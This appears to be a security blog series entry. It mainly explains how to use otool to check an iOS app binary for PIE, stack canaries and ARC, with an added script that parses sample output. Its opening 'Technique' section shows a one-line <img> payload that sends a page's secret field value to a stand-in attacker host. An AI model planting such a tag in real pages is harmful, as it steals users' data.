Technique, Tool and Lecture #15

Technique:

Steal information with an <img> element

<img src="http://attacker/"+document.getElementById('secret').value>

(Source HERE)

Tool:

otool, which is from Apple

Source Code (Link HERE)

Some important uses for it, when testing an iOS App:

otool -hv DamnVulnerableIOSApp (make sure PIE is there)

otool -L <binary> (check shared libraries for vulnerabilities)

otool -f <binary> (check fat headers)

otool -Iv DamnVulnerableIOSApp | grep stack

In the output you're looking for __stack_chk_fail and __stack_chk_guard, the symbols a binary imports when it is built with stack canaries.

otool -Iv DamnVulnerableIOSApp | grep release

ARC binary check. You're looking for:

_objc_retain
_objc_release
_objc_storeStrong
_objc_releaseReturnValue
_objc_autoreleaseReturnValue
_objc_retainAutoreleasedReturnValue
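
The PIE, stack canary and ARC checks above combined into one script, as an added example (not from the original post or from Apple). The function names and the sample otool output are constructed for illustration; the functions take otool's text as an argument so they also work on saved output.

```shell
#!/bin/sh
# Added example: classify otool output for the PIE, canary and ARC checks.
# Each function takes otool's text as $1 (live or saved output).

# PIE: the flags column of `otool -hv` must contain the word PIE.
has_pie() { printf '%s\n' "$1" | grep -qw 'PIE'; }

# Stack canaries: both symbols must appear in `otool -Iv` output.
has_canary() {
    printf '%s\n' "$1" | grep -q '_stack_chk_fail' &&
    printf '%s\n' "$1" | grep -q '_stack_chk_guard'
}

# ARC: print the runtime symbols from the post that are absent.
missing_arc() {
    for sym in _objc_retain _objc_release _objc_storeStrong \
               _objc_releaseReturnValue _objc_autoreleaseReturnValue \
               _objc_retainAutoreleasedReturnValue; do
        # -w stops _objc_release from matching _objc_releaseReturnValue
        printf '%s\n' "$1" | grep -qw -- "$sym" || printf '%s ' "$sym"
    done
}

report() {  # $1 = `otool -hv` text, $2 = `otool -Iv` text
    has_pie "$1"    && echo "PIE: yes"    || echo "PIE: NO"
    has_canary "$2" && echo "canary: yes" || echo "canary: NO"
    m=$(missing_arc "$2")
    [ -z "$m" ] && echo "ARC: all symbols present" || echo "ARC: missing $m"
}

# Constructed sample output, not taken from a real binary.
SAMPLE_HDR='Mach header
      magic cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
   MH_MAGIC     ARM         V7  0x00     EXECUTE    33       3684   NOUNDEFS DYLDLINK TWOLEVEL PIE'
SAMPLE_SYMS='0x0000c2f0   201 ___stack_chk_fail
0x0000d010   202 ___stack_chk_guard
0x0000c300   310 _objc_release
0x0000c310   311 _objc_retain
0x0000c320   312 _objc_storeStrong
0x0000c330   313 _objc_retainAutoreleasedReturnValue'

# Live use on macOS: report "$(otool -hv "$bin")" "$(otool -Iv "$bin")"
report "$SAMPLE_HDR" "$SAMPLE_SYMS"
```

Matching whole words matters for the ARC list: a plain grep for release also hits the longer symbol names, so it cannot tell which of the six are actually imported.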

Lecture:

Check out all the entries of this series!

END TRANSMISSION
